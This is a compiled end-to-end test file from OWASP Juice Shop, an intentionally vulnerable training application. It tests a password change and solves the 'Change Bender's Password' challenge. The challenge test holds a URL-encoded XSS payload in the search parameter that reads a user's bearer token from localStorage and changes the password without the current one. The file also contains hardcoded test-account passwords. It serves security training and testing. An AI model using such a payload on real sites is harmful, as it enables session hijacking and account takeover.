"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const config = require("config");
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
describe('/#/privacy-security/change-password', () => {
    let currentPassword, newPassword, newPasswordRepeat, changeButton;
    describe('as Morty', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `morty@${config.get('application.domain')}`, password: 'focusOnScienceMorty!focusOnScience' });
        beforeEach(() => {
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/privacy-security/change-password`);
            currentPassword = (0, protractor_1.element)(protractor_1.by.id('currentPassword'));
            newPassword = (0, protractor_1.element)(protractor_1.by.id('newPassword'));
            newPasswordRepeat = (0, protractor_1.element)(protractor_1.by.id('newPasswordRepeat'));
            changeButton = (0, protractor_1.element)(protractor_1.by.id('changeButton'));
        });
        it('should be able to change password', () => {
            void currentPassword.sendKeys('focusOnScienceMorty!focusOnScience');
            void newPassword.sendKeys('GonorrheaCantSeeUs!');
            void newPasswordRepeat.sendKeys('GonorrheaCantSeeUs!');
            void changeButton.click();
            expect((0, protractor_1.$)('.confirmation').getAttribute('hidden')).not.toBeTruthy();
        });
    });
    describe('challenge "changePasswordBenderChallenge"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `bender@${config.get('application.domain')}`, password: 'OhG0dPlease1nsertLiquor!' });
        it('should be able to change password via XSS-powered attack on password change without passing current password', () => {
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/search?q=%3Ciframe%20src%3D%22javascript%3Axmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%20xmlhttp.open%28%27GET%27%2C%20%27http%3A%2F%2Flocalhost%3A42000%2Frest%2Fuser%2Fchange-password%3Fnew%3DslurmCl4ssic%26amp%3Brepeat%3DslurmCl4ssic%27%29%3B%20xmlhttp.setRequestHeader%28%27Authorization%27%2C%60Bearer%3D%24%7BlocalStorage.getItem%28%27token%27%29%7D%60%29%3B%20xmlhttp.send%28%29%3B%22%3E`);
            void protractor_1.browser.driver.sleep(2000);
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/login`);
            void (0, protractor_1.element)(protractor_1.by.id('email')).sendKeys(`bender@${config.get('application.domain')}`);
            void (0, protractor_1.element)(protractor_1.by.id('password')).sendKeys('slurmCl4ssic');
            void (0, protractor_1.element)(protractor_1.by.id('loginButton')).click();
            expect(protractor_1.browser.getCurrentUrl()).toMatch(/\/search/);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Change Bender\'s Password' });
    });
});
//# sourceMappingURL=changePasswordSpec.js.map
